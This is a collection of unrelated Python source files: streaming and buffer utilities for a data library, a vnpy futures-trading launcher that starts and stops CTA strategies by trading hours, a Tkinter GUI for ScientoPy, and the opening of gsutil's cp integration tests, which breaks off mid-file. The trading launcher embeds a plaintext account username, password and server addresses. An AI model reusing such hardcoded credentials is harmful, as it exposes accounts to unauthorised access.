yield row_mask.format(*np.random.normal(loc=loc, scale=scale,
size=self._cols))
def read(self, n=0):
if n == 0:
n = self._size
if self._pos > self._size - 1:
return b''
if self._pos + n > self._size:
n = self._size - self._pos
self._pos += n
if n == len(self._reminder):
ret = self._reminder
self._reminder = ""
return ret.encode('utf-8')
if n < len(self._reminder):
ret = self._reminder[:n]
self._reminder = self._reminder[n:]
return ret.encode('utf-8')
# n > len(self._reminder)
n2 = n - len(self._reminder)
rem = n2 % self._yield_size
n_yield = n2 // self._yield_size
if rem:
n_yield += 1
s = "".join([elt for _, elt in zip(range(n_yield), self._generator)])
raw_str = self._reminder + s
ret = raw_str[:n]
self._reminder = raw_str[n:]
return ret.encode('utf-8')
def tell(self):
return self._pos
def size(self):
return self._size
def __iter__(self):
return self
def __next__(self):
if self._reminder:
ret = self._reminder
self._reminder = ''
self._pos += len(ret)
return ret
if self._pos + self._yield_size > self._size:
raise StopIteration
self._pos += self._yield_size
return next(self._generator)
# def next(self):
# return self.__next__()
def readline(self):
try:
return self.__next__()
except StopIteration:
return ''
def readlines(self):
return list(self)
def save(self, file_name, force=False):
if os.path.exists(file_name) and not force:
raise ValueError("File {} already exists!".format(file_name))
with open(file_name, 'wb') as fd:
for row in self:
fd.write(bytes(row, encoding='ascii'))
def __str__(self):
return "<{} cols={}, rows={} bytes={}>".format(type(self), self._cols,
self._rows, self._size)
def __repr__(self):
return self.__str__()
def _make_csv_fifo_impl(rand_io, file_name):
rand_io.save(file_name, force=True)
def make_csv_fifo(rand_io, file_name=None):
if file_name is None:
dir_name = tempfile.mkdtemp(prefix='p10s_rand_')
file_name = os.path.join(dir_name, 'buffer.csv')
elif os.path.exists(file_name):
raise ValueError("File {} already exists!".format(file_name))
os.mkfifo(file_name)
p = Process(target=_make_csv_fifo_impl, args=(rand_io, file_name))
p.start()
return file_name
def del_tmp_csv_fifo(file_name):
if not file_name.startswith('/tmp/p10s_rand_'):
raise ValueError("Not in /tmp/p10s_rand_... {}".format(file_name))
mode = os.stat(file_name).st_mode
if not st.S_ISFIFO(mode):
raise ValueError("Not a FIFO {}".format(file_name))
dn = os.path.dirname(file_name)
os.remove(file_name)
os.rmdir(dn)
def is_s3_url(url) -> bool:
"""Check for an s3, s3n, or s3a url"""
if not isinstance(url, str):
return False
return parse_url(url).scheme in ["s3", "s3n", "s3a"]
def _is_buffer_url(url):
res = parse_url(url)
return res.scheme == 'buffer'
def _url_to_buffer(url):
res = parse_url(url)
if res.scheme != 'buffer':
raise ValueError("Wrong buffer url: {}".format(url))
dict_ = parse_qs(res.query, strict_parsing=1)
kwargs = dict([(k, int(e[0])) for (k, e) in dict_.items()])
return RandomBytesIO(**kwargs)
#
# from pandas-dev: _strip_schema, s3_get_filepath_or_buffer
#
def _strip_schema(url):
"""Returns the url without the s3:// part"""
result = parse_url(url)
return result.netloc + result.path
def s3_get_filepath_or_buffer(filepath_or_buffer, encoding=None,
compression=None):
# pylint: disable=unused-argument
fs = s3fs.S3FileSystem(anon=False)
from botocore.exceptions import NoCredentialsError
try:
filepath_or_buffer = fs.open(_strip_schema(filepath_or_buffer))
except (OSError, NoCredentialsError):
# boto3 has troubles when trying to access a public file
# when credentialed...
# An OSError is raised if you have credentials, but they
# aren't valid for that bucket.
# A NoCredentialsError is raised if you don't have creds
# for that bucket.
fs = s3fs.S3FileSystem(anon=True)
filepath_or_buffer = fs.open(_strip_schema(filepath_or_buffer))
return filepath_or_buffer, None, compression
def filepath_to_buffer(filepath, encoding=None,
compression=None, timeout=None, start_byte=0):
if not is_str(filepath):
# if start_byte:
# filepath.seek(start_byte)
return filepath, encoding, compression, filepath.size()
if is_url(filepath):
headers = None
if start_byte:
headers = {"Range": "bytes={}-".format(start_byte)}
req = requests.get(filepath, stream=True, headers=headers,
timeout=timeout)
content_encoding = req.headers.get('Content-Encoding', None)
if content_encoding == 'gzip':
compression = 'gzip'
size = req.headers.get('Content-Length', 0)
# return HttpDesc(req.raw, filepath), encoding, compression, int(size)
return req.raw, encoding, compression, int(size)
if is_s3_url(filepath):
reader, encoding, compression = s3_get_filepath_or_buffer(
filepath,
encoding=encoding,
compression=compression)
return reader, encoding, compression, reader.size
if _is_buffer_url(filepath):
buffer = _url_to_buffer(filepath)
return buffer, encoding, compression, buffer.size()
filepath = os.path.expanduser(filepath)
if not os.path.exists(filepath):
raise ValueError("wrong filepath: {}".format(filepath))
size = os.stat(filepath).st_size
stream = io.FileIO(filepath)
if start_byte:
stream.seek(start_byte)
return stream, encoding, compression, size
_compression_to_extension = {
'gzip': '.gz',
'bz2': '.bz2',
'zip': '.zip',
'xz': '.xz',
}
def _infer_compression(filepath_or_buffer, compression):
"""
From Pandas.
Get the compression method for filepath_or_buffer. If compression='infer',
the inferred compression method is returned. Otherwise, the input
compression method is returned unchanged, unless it's invalid, in which
case an error is raised.
Parameters
----------
filepath_or_buf :
a path (str) or buffer
compression : str or None
the compression method including None for no compression and 'infer'
Returns
-------
string or None :
compression method
Raises
------
ValueError on invalid compression specified
"""
# No compression has been explicitly specified
if compression is None:
return None
if not is_str(filepath_or_buffer):
return None
# Infer compression from the filename/URL extension
if compression == 'infer':
for compression, extension in _compression_to_extension.items():
if filepath_or_buffer.endswith(extension):
return compression
return None
# Compression has been specified. Check that it's valid
if compression in _compression_to_extension:
return compression
msg = 'Unrecognized compression type: {}'.format(compression)
valid = ['infer', None] + sorted(_compression_to_extension)
msg += '\nValid compression types are {}'.format(valid)
raise ValueError(msg)
def get_physical_base(t):
# TODO: obsolete, to be removed
return t
def force_valid_id_columns(df):
uniq = set()
columns = []
i = 0
for c in df.columns:
i += 1
if not isinstance(c, str):
c = str(c)
c = fix_identifier(c)
while c in uniq:
c += ('_' + str(i))
columns.append(c)
df.columns = columns
class _Bag(object):
pass
class Dialog(object):
def __init__(self, module, started=False):
self._module = module
self.bag = _Bag()
self._started = started
def set_started(self, v=True):
self._started = v
return self
def set_output_table(self, res):
self._module.result = res
return self
@property
def is_started(self):
return self._started
@property
def output_table(self):
return self._module.result
def spy(*args, **kwargs):
import time
f = open(kwargs.pop('file'), "a")
print(time.time(), *args, file=f, flush=True, **kwargs)
f.close()
def patch_this(to_decorate, module, patch):
"""
patch decorator
"""
def patch_decorator(to_decorate):
"""
This is the actual decorator. It brings together the function to be
decorated and the decoration stuff
"""
@wraps(to_decorate)
def patch_wrapper(*args, **kwargs):
"""
This function is the decoration
run_step(self, run_number, step_size, howlong)
"""
patch.before_run_step(module, *args, **kwargs)
ret = to_decorate(*args, **kwargs)
patch.after_run_step(module, *args, **kwargs)
return ret
return patch_wrapper
return patch_decorator(to_decorate)
class ModulePatch(object):
def __init__(self, name):
self._name = name
self.applied = False
def patch_condition(self, m):
if self.applied:
return False
return self._name == m.name
def before_run_step(self, m, *args, **kwargs):
pass
def after_run_step(self, m, *args, **kwargs):
pass
def decorate_module(m, patch):
assert hasattr(m, 'run_step')
m.run_step = patch_this(to_decorate=m.run_step, module=m, patch=patch)
patch.applied = True
def decorate(scheduler, patch):
for m in scheduler.modules().values():
if patch.patch_condition(m):
decorate_module(m, patch)
class JSONEncoderNp(js.JSONEncoder):
"Encode numpy objects"
def default(self, o):
"Handle default encoding."
if isinstance(o, float) and np.isnan(o):
return None
if isinstance(o, np.integer):
return int(o)
if isinstance(o, np.floating): # np.float32 don't inherit from float
return float(o)
if isinstance(o, np.bool_):
return bool(o)
if isinstance(o, np.ndarray):
return o.tolist()
if isinstance(o, bitmap):
return list(o)
return js.JSONEncoder.default(self, o)
@staticmethod
def dumps(*args, **kwargs):
return js.dumps(*args, cls=JSONEncoderNp, **kwargs)
@staticmethod
def loads(*args, **kwargs):
return js.loads(*args, **kwargs)
@staticmethod
def cleanup(*args, **kwargs):
s = JSONEncoderNp.dumps(*args, **kwargs)
return JSONEncoderNp.loads(s)
async def asynchronize(f, *args, **kwargs):
# cf. https://docs.python.org/3/library/asyncio-eventloop.html#asyncio.loop.run_in_executor
loop = aio.get_running_loop()
fun = ft.partial(f, *args, **kwargs)
return await loop.run_in_executor(
None, fun)
def gather_and_run(*args):
"""
this function avoids the use on the "%gui asyncio" magic in notebook
"""
async def gath():
await aio.gather(*args)
def func_():
loop = aio.new_event_loop()
aio.set_event_loop(loop)
loop.run_until_complete(gath())
loop.close()
thread = threading.Thread(target=func_, args=())
thread.start()
def is_notebook():
try:
from IPython import get_ipython
return get_ipython().__class__.__name__ == 'ZMQInteractiveShell'
except ImportError:
pass
print("not in notebook")
return False
def filter_cols(df, columns=None, indices=None):
"""
Return the specified table filtered by the specified indices and
limited to the columns of interest.
"""
if columns is None:
if indices is None:
return df
return df.loc[indices]
cols = columns
if cols is None:
return None
if indices is None:
indices = slice(0, None)
return df.loc[indices, cols]
|
run_cli.py
|
import multiprocessing
from time import sleep
from datetime import datetime, time
from logging import INFO
from vnpy.event import EventEngine
from vnpy.trader.setting import SETTINGS
from vnpy.trader.engine import MainEngine
from vnpy.gateway.ctp import CtpGateway
from vnpy.gateway.xtp import XtpGateway
from vnpy.app.cta_strategy import CtaStrategyApp
from vnpy.app.cta_strategy.base import EVENT_CTA_LOG
from vnpy.app.risk_manager import RiskManagerApp
import json
SETTINGS["log.active"] = True
SETTINGS["log.level"] = INFO
SETTINGS["log.console"] = True
# 国内期货CTP SimNow
ctp_setting = {
"用户名": "53191002042",
"密码": "Sbiwh1Po",
"经纪商代码": 9999,
"交易服务器": "120.27.164.69:6001",
"行情服务器": "120.27.164.138:6002",
"产品名称": "simnow_client_test",
"授权编码": "0000000000000000",
"产品信息": ""
}
def run_child():
"""
Running in the child process.
"""
SETTINGS["log.file"] = True
event_engine = EventEngine()
main_engine = MainEngine(event_engine)
# main_engine.add_gateway(CtpGateway)
main_engine.add_gateway(XtpGateway, gateway_name='Xtp_test')
print(58, main_engine.gateways)
print(main_engine.get_all_gateway_names())
print(main_engine.get_all_gateway_status())
for gateway_name in main_engine.gateways:
xtp_setting = json.load(open(f"./connect_{gateway_name}.json", "r", encoding="utf8"))
main_engine.connect(xtp_setting, gateway_name)
sleep(2)
print(main_engine.get_all_gateway_status())
print(59)
cta_engine = main_engine.add_app(CtaStrategyApp)
main_engine.add_app(RiskManagerApp)
main_engine.write_log("主引擎创建成功")
log_engine = main_engine.get_engine("log")
event_engine.register(EVENT_CTA_LOG, log_engine.process_log_event)
main_engine.write_log("注册日志事件监听")
# main_engine.connect(ctp_setting, "CTP")
main_engine.write_log("连接CTP接口")
sleep(10)
cta_engine.init_engine()
main_engine.write_log("CTA策略初始化完成")
cta_engine.init_all_strategies()
sleep(60) # Leave enough time to complete strategy initialization
main_engine.write_log("CTA策略全部初始化")
cta_engine.start_all_strategies()
main_engine.write_log("CTA策略全部启动")
while True:
sleep(1)
def run_parent():
"""
Running in the parent process.
"""
print("启动CTA策略守护父进程")
# Chinese futures market trading period (day/night)
DAY_START = time(8, 45)
DAY_END = time(15, 30)
NIGHT_START = time(20, 45)
NIGHT_END = time(2, 45)
child_process = None
while True:
current_time = datetime.now().time()
trading = False
# Check whether in trading period
if (
(current_time >= DAY_START and current_time <= DAY_END)
or (current_time >= NIGHT_START)
or (current_time <= NIGHT_END)
):
trading = True
# Start child process in trading period
if trading and child_process is None:
print("启动子进程")
child_process = multiprocessing.Process(target=run_child)
child_process.start()
print("子进程启动成功")
# 非记录时间则退出子进程
if not trading and child_process is not None:
print("关闭子进程")
child_process.terminate()
child_process.join()
child_process = None
print("子进程关闭成功")
sleep(5)
if __name__ == "__main__":
run_parent()
|
ScientoPyGui.py
|
# !/usr/bin/python3
# The MIT License (MIT)
# Copyright (c) 2018 - Universidad del Cauca, Juan Ruiz-Rosero
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
# DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
# OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE
# OR OTHER DEALINGS IN THE SOFTWARE.
from tkinter import *
from tkinter import filedialog
from tkinter import ttk
from tkinter import messagebox
from tkinter import font
from tkinter.ttk import Progressbar
import time
import threading
import tkinter.scrolledtext as scrolledtext
from PIL import ImageTk, ImageColor, Image
import globalVar
from PreProcessClass import PreProcessClass
from ScientoPyClass import ScientoPyClass
from generateBibtex import generateBibtex
import webbrowser
import os.path
class ScientoPyGui:
cb_square_color = 'white'
def __init__(self):
self.scientoPy = ScientoPyClass(from_gui=True)
self.preprocess = PreProcessClass(from_gui=True)
self.root = Tk()
self.root.geometry("853x480")
self.root.resizable(width=False, height=False)
try:
bg_color = self.root.cget('bg')
bg_color_rgb = ImageColor.getcolor(bg_color, "RGB")
bg_color_avg = sum(bg_color_rgb)/len(bg_color_rgb)
if(bg_color_avg < 75):
self.cb_square_color = bg_color
except:
pass
default_font = font.nametofont("TkDefaultFont")
default_font.configure(size=10)
self.root.option_add("*font", default_font)
if os.path.exists('scientopy_icon.png'):
self.root.iconphoto(True, PhotoImage(file="scientopy_icon.png"))
self.root.title("ScientoPy")
# Starting the tabs
self.nb = ttk.Notebook(self.root)
preprocess_page = Frame(self.nb)
process_page = Frame(self.nb)
self.nb.add(preprocess_page, text='1. Pre-processing')
self.nb.add(process_page, text='2. Analysis')
self.nb.pack(expand=1, fill="both")
self.nb.select(preprocess_page)
# Pre processing tab *******************************
if os.path.exists('scientopy_logo.png'):
load = Image.open("scientopy_logo.png")
render = ImageTk.PhotoImage(load)
img = Label(preprocess_page, image=render)
img.image = render
img.place(relx=0.5, rely=0.35, anchor=CENTER)
version_label = Label(preprocess_page, text=("Universidad del Cauca, Popayán, Colombia"
"\nMIT License \nVersion %s" % globalVar.SCIENTOPY_VERSION))
version_label.place(relx=0.5, rely=0.7, anchor=CENTER)
Label(preprocess_page, text="Dataset folder:").grid(column=0, row=0, padx=17)
preprocess_page.grid_rowconfigure(0, pad=700)
self.datasetLoc = StringVar()
preprocess_page.grid_columnconfigure(2, weight=1)
self.datasetLocEntry = Entry(preprocess_page, textvariable=self.datasetLoc)
# self.datasetLocEntry.place(relx=0.47, rely=0.8, anchor=CENTER)
self.datasetLocEntry.grid(column=1, row=0, columnspan=2, sticky='we')
dataset_button = Button(preprocess_page, text="Select dataset", command=self.select_dataset)
# dataset_button.place(relx=0.9, rely=0.8, anchor=CENTER)
dataset_button.grid(column=3, row=0, sticky='w', padx=17)
self.chkValueRemoveDupl = BooleanVar()
self.chkValueRemoveDupl.set(True)
Checkbutton(preprocess_page, var=self.chkValueRemoveDupl,
text="Remove duplicated documents",
selectcolor=self.cb_square_color).place(relx=0.015, rely=0.9, anchor=W)
# Buttons ****************************
run_preprocess_button = Button(preprocess_page, text="Run preprocess", command=self.run_preprocess)
run_preprocess_button.place(relx=0.9, rely=0.9, anchor=CENTER)
open_preprocess_brief = Button(preprocess_page, text="Open preprocess brief",
command=self.open_preprocess_brief)
open_preprocess_brief.place(relx=0.57, rely=0.9, anchor=W)
# Analysis tab ************************************************************
Label(process_page, text="").grid(sticky=W, column=0, row=0)
Label(process_page, text="Criterion:", borderwidth=10).grid(sticky=W, column=0, row=1)
self.comboCriterion = ttk.Combobox(process_page, values=globalVar.validCriterion, width=15)
self.comboCriterion.current(3)
self.comboCriterion.grid(column=1, row=1)
Label(process_page, text="Graph type:", borderwidth=10).grid(sticky=W, column=0, row=2)
self.comboGraphType = ttk.Combobox(process_page, values=globalVar.validGrapTypes, width=15)
self.comboGraphType.current(0)
self.comboGraphType.grid(column=1, row=2)
Label(process_page, text="Start Year:", borderwidth=10).grid(sticky=W, column=0, row=3)
self.spinStartYear = Spinbox(process_page, from_=1900, to=2100,
textvariable=DoubleVar(value=globalVar.DEFAULT_START_YEAR), width=15)
self.spinStartYear.grid(column=1, row=3)
Label(process_page, text="End Year:", borderwidth=10).grid(sticky=W, column=0, row=4)
self.spinEndYear = Spinbox(process_page, from_=1900, to=2100,
textvariable=DoubleVar(value=globalVar.DEFAULT_END_YEAR), width=15)
self.spinEndYear.grid(column=1, row=4)
Label(process_page, text="Topics length:", borderwidth=10).grid(sticky=W, column=0, row=5)
self.spinTopicsLength = Spinbox(process_page, from_=0, to=1000, textvariable=DoubleVar(value=10),
width=15)
self.spinTopicsLength.grid(column=1, row=5)
Label(process_page, text="Skip first:", borderwidth=10).grid(sticky=W, column=0, row=6)
self.spinSkipFirst = Spinbox(process_page, from_=0, to=1000, textvariable=DoubleVar(value=0),
width=15)
self.spinSkipFirst.grid(column=1, row=6)
Label(process_page, text="Window (years):", borderwidth=10).grid(sticky=W, column=0, row=7)
self.spinWindowWidth = Spinbox(process_page, from_=1, to=100, textvariable=DoubleVar(value=2),
width=15)
self.spinWindowWidth.grid(column=1, row=7)
self.chkValuePreviusResults = BooleanVar()
self.chkValuePreviusResults.set(False)
Checkbutton(process_page, var=self.chkValuePreviusResults, selectcolor=self.cb_square_color,
text="Use previous results").grid(sticky=W, column=0, row=8, padx=7)
self.chkValueTrendAnalysis = BooleanVar()
self.chkValueTrendAnalysis.set(False)
Checkbutton(process_page, var=self.chkValueTrendAnalysis, selectcolor=self.cb_square_color,
text="Trend analysis").grid(sticky=W, column=0, row=9, padx=7)
process_page.grid_columnconfigure(2, weight=1)
Label(process_page, text="Custom topics:", borderwidth=10).grid(sticky=W, column=2, row=1, padx=15)
self.entryCustomTopics = scrolledtext.ScrolledText(process_page, undo=True, height=18)
self.entryCustomTopics.grid(column=2, row=2, rowspan=9, sticky=E, padx=25)
# Buttons ****************************
results_button = Button(process_page, text="Open results table", command=self.open_results)
results_button.place(relx=0.008, rely=0.92, anchor=W)
ext_results_button = Button(process_page, text="Open extended results", command=self.open_ext_results)
ext_results_button.place(relx=0.20, rely=0.92, anchor=W)
genbibtex_button = Button(process_page, text="Generate BibTeX", command=self.generate_bibtex)
genbibtex_button.place(relx=0.45, rely=0.92, anchor=W)
run_button = Button(process_page, text="Run", command=self.scientoPyRun)
run_button.place(relx=0.96, rely=0.92, anchor=E)
def cancel_run(self):
globalVar.cancelProcess = True
print("Canceled")
def progress_bar_fun(self):
def on_closing():
self.cancel_run()
#start progress bar
popup = Toplevel()
popup.protocol("WM_DELETE_WINDOW", on_closing)
x = self.root.winfo_x()
y = self.root.winfo_y()
popup.geometry('300x120+%d+%d' % (x + 250, y + 120))
popup.title("Progress")
label_text = StringVar()
label = Label(popup, textvariable=label_text)
label.place(x=150, y=20, anchor="center")
label_text.set(globalVar.progressText)
progress_var = DoubleVar()
progress_bar = ttk.Progressbar(popup, variable=progress_var, maximum=100, length = 280)
progress_bar.place(x=150, y=50, anchor="center")
popup.pack_slaves()
cancel_button = Button(popup, text="Cancel", command=self.cancel_run)
cancel_button.place(x=150, y=95, anchor="center")
#print("globalVar.progressPer1: %d" % globalVar.progressPer)
while globalVar.progressPer != 101:
label_text.set(globalVar.progressText)
popup.update()
time.sleep(0.1)
#print("globalVar.progressPer2: %d" % globalVar.progressPer)
progress_var.set(globalVar.progressPer)
if globalVar.cancelProcess:
break
popup.destroy()
return 0
def open_results(self):
if os.path.exists(self.scientoPy.resultsFileName):
webbrowser.open(self.scientoPy.resultsFileName)
else:
messagebox.showinfo("Error", "No results found, please run the analysis first")
def open_ext_results(self):
if os.path.exists(self.scientoPy.extResultsFileName):
webbrowser.open(self.scientoPy.extResultsFileName)
else:
messagebox.showinfo("Error", "No extended results found, please run the analysis first")
def open_preprocess_brief(self):
if os.path.exists(self.scientoPy.preprocessBriefFileName):
webbrowser.open(self.scientoPy.preprocessBriefFileName)
else:
messagebox.showinfo("Error", "No preprocess breif found, please run the preprocess first")
def scientoPyRun(self):
globalVar.cancelProcess = False
globalVar.progressPer = 0
if not os.path.exists(self.scientoPy.preprocessDatasetFile):
messagebox.showinfo("Error", "No preprocess input dataset, please run the preprocess first")
return
print(self.chkValuePreviusResults.get())
self.scientoPy.closePlot()
self.scientoPy.criterion = self.comboCriterion.get()
self.scientoPy.graphType = self.comboGraphType.get()
self.scientoPy.startYear = int(self.spinStartYear.get())
self.scientoPy.endYear = int(self.spinEndYear.get())
self.scientoPy.length = int(self.spinTopicsLength.get())
self.scientoPy.skipFirst = int(self.spinSkipFirst.get())
self.scientoPy.windowWidth = int(self.spinWindowWidth.get())
self.scientoPy.previousResults = self.chkValuePreviusResults.get()
self.scientoPy.trend = self.chkValueTrendAnalysis.get()
if bool(self.entryCustomTopics.get("1.0", END).strip()):
self.scientoPy.topics = self.entryCustomTopics.get("1.0", END).replace("\n", ";")
else:
self.scientoPy.topics = ''
t1 = threading.Thread(target=self.scientoPy.scientoPy)
t1.start()
self.progress_bar_fun()
t1.join()
if globalVar.cancelProcess:
return
self.scientoPy.plotResults()
def select_dataset(self):
self.root.dir_name = filedialog.askdirectory()
if not self.root.dir_name:
return
self.datasetLoc.set(self.root.dir_name)
def run_preprocess(self):
print(self.datasetLoc.get())
if self.datasetLoc.get():
try:
self.preprocess.dataInFolder = self.root.dir_name
self.preprocess.noRemDupl = not self.chkValueRemoveDupl.get()
# Run preprocess in another thread
t1 = threading.Thread(target=self.preprocess.preprocess)
t1.start()
# While running preprocess run progress bar
# Progress bar ends when preprocess ends
self.progress_bar_fun()
# Wait until preprocess thread ends
t1.join()
if globalVar.cancelProcess:
messagebox.showinfo("Error", "Preprocessing canceled")
elif(globalVar.totalPapers > 0):
self.preprocess.graphBrief()
elif globalVar.totalPapers == 0:
messagebox.showinfo("Error", "No valid dataset files found in: %s" % self.root.dir_name)
except:
messagebox.showinfo("Error", "No valid dataset folder")
else:
messagebox.showinfo("Error", "No dataset folder defined")
def generate_bibtex(self):
if not os.path.exists(self.scientoPy.preprocessDatasetFile):
messagebox.showinfo("Error", "No preprocess input dataset, please run the preprocess first")
return
latexFileName = filedialog.askopenfilename(initialdir="./", title="Select the LaTeX file",
filetypes=(("Latex", "*.tex"), ("all files", "*.*")))
if not latexFileName:
return
print(latexFileName)
outFileName = generateBibtex(latexFileName)
webbrowser.open(outFileName)
def runGui(self):
self.root.mainloop()
if __name__ == '__main__':
scientoPyGui = ScientoPyGui()
scientoPyGui.runGui()
|
test_cp.py
|
# -*- coding: utf-8 -*-
# Copyright 2013 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Integration tests for cp command."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import ast
import base64
import binascii
import datetime
import gzip
import logging
import os
import pickle
import pkgutil
import random
import re
import stat
import string
import sys
import threading
from unittest import mock
from apitools.base.py import exceptions as apitools_exceptions
import boto
from boto import storage_uri
from boto.exception import ResumableTransferDisposition
from boto.exception import StorageResponseError
from boto.storage_uri import BucketStorageUri
from gslib import exception
from gslib import name_expansion
from gslib.cloud_api import ResumableUploadStartOverException
from gslib.commands.config import DEFAULT_SLICED_OBJECT_DOWNLOAD_THRESHOLD
from gslib.cs_api_map import ApiSelector
from gslib.daisy_chain_wrapper import _DEFAULT_DOWNLOAD_CHUNK_SIZE
from gslib.discard_messages_queue import DiscardMessagesQueue
from gslib.exception import InvalidUrlError
from gslib.gcs_json_api import GcsJsonApi
from gslib.parallel_tracker_file import ObjectFromTracker
from gslib.parallel_tracker_file import WriteParallelUploadTrackerFile
from gslib.project_id import PopulateProjectId
from gslib.storage_url import StorageUrlFromString
from gslib.tests.rewrite_helper import EnsureRewriteResumeCallbackHandler
from gslib.tests.rewrite_helper import HaltingRewriteCallbackHandler
from gslib.tests.rewrite_helper import RewriteHaltException
import gslib.tests.testcase as testcase
from gslib.tests.testcase.base import NotParallelizable
from gslib.tests.testcase.integration_testcase import SkipForGS
from gslib.tests.testcase.integration_testcase import SkipForS3
from gslib.tests.testcase.integration_testcase import SkipForXML
from gslib.tests.testcase.integration_testcase import SkipForJSON
from gslib.tests.util import BuildErrorRegex
from gslib.tests.util import GenerationFromURI as urigen
from gslib.tests.util import HaltingCopyCallbackHandler
from gslib.tests.util import HaltOneComponentCopyCallbackHandler
from gslib.tests.util import HAS_GS_PORT
from gslib.tests.util import HAS_S3_CREDS
from gslib.tests.util import ObjectToURI as suri
from gslib.tests.util import ORPHANED_FILE
from gslib.tests.util import POSIX_GID_ERROR
from gslib.tests.util import POSIX_INSUFFICIENT_ACCESS_ERROR
from gslib.tests.util import POSIX_MODE_ERROR
from gslib.tests.util import POSIX_UID_ERROR
from gslib.tests.util import SequentialAndParallelTransfer
from gslib.tests.util import SetBotoConfigForTest
from gslib.tests.util import SetEnvironmentForTest
from gslib.tests.util import TailSet
from gslib.tests.util import TEST_ENCRYPTION_KEY1
from gslib.tests.util import TEST_ENCRYPTION_KEY1_SHA256_B64
from gslib.tests.util import TEST_ENCRYPTION_KEY2
from gslib.tests.util import TEST_ENCRYPTION_KEY3
from gslib.tests.util import unittest
from gslib.third_party.storage_apitools import storage_v1_messages as apitools_messages
from gslib.tracker_file import DeleteTrackerFile
from gslib.tracker_file import GetRewriteTrackerFilePath
from gslib.tracker_file import GetSlicedDownloadTrackerFilePaths
from gslib.ui_controller import BytesToFixedWidthString
from gslib.utils import hashing_helper
from gslib.utils.boto_util import UsingCrcmodExtension
from gslib.utils.constants import START_CALLBACK_PER_BYTES
from gslib.utils.constants import UTF8
from gslib.utils.copy_helper import GetTrackerFilePath
from gslib.utils.copy_helper import PARALLEL_UPLOAD_STATIC_SALT
from gslib.utils.copy_helper import PARALLEL_UPLOAD_TEMP_NAMESPACE
from gslib.utils.copy_helper import TrackerFileType
from gslib.utils.hashing_helper import CalculateB64EncodedMd5FromContents
from gslib.utils.hashing_helper import CalculateMd5FromContents
from gslib.utils.hashing_helper import GetMd5
from gslib.utils.metadata_util import CreateCustomMetadata
from gslib.utils.posix_util import GID_ATTR
from gslib.utils.posix_util import MODE_ATTR
from gslib.utils.posix_util import NA_ID
from gslib.utils.posix_util import NA_MODE
from gslib.utils.posix_util import UID_ATTR
from gslib.utils.posix_util import ParseAndSetPOSIXAttributes
from gslib.utils.posix_util import ValidateFilePermissionAccess
from gslib.utils.posix_util import ValidatePOSIXMode
from gslib.utils.retry_util import Retry
from gslib.utils.system_util import IS_WINDOWS
from gslib.utils.text_util import get_random_ascii_chars
from gslib.utils.unit_util import EIGHT_MIB
from gslib.utils.unit_util import HumanReadableToBytes
from gslib.utils.unit_util import MakeHumanReadable
from gslib.utils.unit_util import ONE_KIB
from gslib.utils.unit_util import ONE_MIB
import six
from six.moves import http_client
from six.moves import range
from six.moves import xrange
if six.PY3:
long = int # pylint: disable=redefined-builtin,invalid-name
# These POSIX-specific variables aren't defined for Windows.
# pylint: disable=g-import-not-at-top
if not IS_WINDOWS:
from gslib.tests import util
from gslib.tests.util import DEFAULT_MODE
from gslib.tests.util import GetInvalidGid
from gslib.tests.util import GetNonPrimaryGid
from gslib.tests.util import GetPrimaryGid
from gslib.tests.util import INVALID_UID
from gslib.tests.util import USER_ID
# pylint: enable=g-import-not-at-top
def TestCpMvPOSIXBucketToLocalErrors(cls, bucket_uri, obj, tmpdir, is_cp=True):
"""Helper function for preserve_posix_errors tests in test_cp and test_mv.
Args:
cls: An instance of either TestCp or TestMv.
bucket_uri: The uri of the bucket that the object is in.
obj: The object to run the tests on.
tmpdir: The local file path to cp to.
is_cp: Whether or not the calling test suite is cp or mv.
"""
error = 'error'
# A dict of test_name: attrs_dict.
# attrs_dict holds the different attributes that we want for the object in a
# specific test.
# To minimize potential test flakes from the system's GID mapping changing
# mid-test, we use the GID-related methods that fetch GID info each time,
# rather than reusing the LazyWrapper-wrapped constants across operations.
test_params = {
'test1': {
MODE_ATTR: '333',
error: POSIX_MODE_ERROR
},
'test2': {
GID_ATTR: GetInvalidGid,
error: POSIX_GID_ERROR
},
'test3': {
GID_ATTR: GetInvalidGid,
MODE_ATTR: '420',
error: POSIX_GID_ERROR
},
'test4': {
UID_ATTR: INVALID_UID,
error: POSIX_UID_ERROR
},
'test5': {
UID_ATTR: INVALID_UID,
MODE_ATTR: '530',
error: POSIX_UID_ERROR
},
'test6': {
UID_ATTR: INVALID_UID,
GID_ATTR: GetInvalidGid,
error: POSIX_UID_ERROR
},
'test7': {
UID_ATTR: INVALID_UID,
GID_ATTR: GetInvalidGid,
MODE_ATTR: '640',
error: POSIX_UID_ERROR
},
'test8': {
UID_ATTR: INVALID_UID,
GID_ATTR: GetPrimaryGid,
error: POSIX_UID_ERROR
},
'test9': {
UID_ATTR: INVALID_UID,
GID_ATTR: GetNonPrimaryGid,
error: POSIX_UID_ERROR
},
'test10': {
UID_ATTR: INVALID_UID,
GID_ATTR: GetPrimaryGid,
MODE_ATTR: '640',
error: POSIX_UID_ERROR
},
'test11': {
UID_ATTR: INVALID_UID,
GID_ATTR: GetNonPrimaryGid,
MODE_ATTR: '640',
error: POSIX_UID_ERROR
},
'test12': {
UID_ATTR: USER_ID,
